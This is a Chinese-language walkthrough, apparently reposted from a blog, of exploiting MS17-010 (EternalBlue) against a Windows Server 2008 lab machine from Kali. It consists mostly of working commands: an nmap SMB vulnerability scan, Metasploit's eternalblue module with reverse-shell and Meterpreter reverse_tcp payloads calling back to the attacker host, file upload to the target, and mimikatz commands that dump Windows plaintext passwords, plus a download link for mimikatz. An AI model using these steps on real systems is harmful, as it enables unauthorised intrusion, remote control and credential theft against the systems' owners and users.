MS17-010 漏洞利用


環境

  • 被攻擊目標IP: 192.168.118.137 系統類型:windows server 2008
  • 攻擊IP(黑客主機): 192.168.118.130 系統類型: KALI

使用nmap 探測smb漏洞

nmap -p139,445 -Pn -n  --script  smb-vuln-*     192.168.118.137

#掃描結果顯示存在 MS17-010漏洞

# -Pn :跳過主機存活監測
# -n: 關閉域名查詢
# smb-vuln-*: *指代以smb-vuln-所有的漏洞腳本

使用Metasploit攻擊

  • 啟動MSF: msfconsole

  • 搜索攻擊模塊:search ms17-010

  • 加載模塊:

use exploit/windows/smb/ms17_010_eternalblue 

使用show options 或者options查看選項設置
可以使用show targets來查看可以攻擊的系統版本
使用show payloads可以加載所有可以使用的攻擊向量

設置攻擊目標

set RHOST 192.168.118.137

設置並加載payload:

 set payload generic/shell_reverse_tcp 

並設置反彈shell連接的地址和端口,默認端口是4444

set LHOST 192.168.118.130

使用命令expolit或者run進行攻擊:攻擊成功后會反彈shell

PAYLOAD2 持久會話

#接着上面的繼續使用下面的payload,可以進行文件上傳
set payload windows/x64/meterpreter/reverse_tcp

然后使用 run

Meterpreter session 2 opened (192.168.118.130:4444 -> 192.168.118.137:49159) at 2018-09-13 15:42:36 +0800
這句話告訴我們反彈了一個會話本機的4444到目標主機的49159
使用命令進入會話: sessions 2
使用upload 上傳文件,將本機的/root/x64/的文件上傳到目標主機

mimikatz 獲取hash 以及明文密碼

下載地址:https://pan.baidu.com/s/1RX9FGQRUtZJQQ_6Lyq1m-Q 密碼:coxc

下面我們利用mimikatz獲取目標主機的管理員密碼:
輸入shell進入目標主機的CMD

mimikatz使用幫助:

輸入xxx::能夠看看mimikatz的命令幫助
輸入privilege::回車能看到privilege的命令幫助

輸入privilege::debug進行提權操作
輸入sekurlsa::logonPasswords獲取windows用戶密碼

END


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM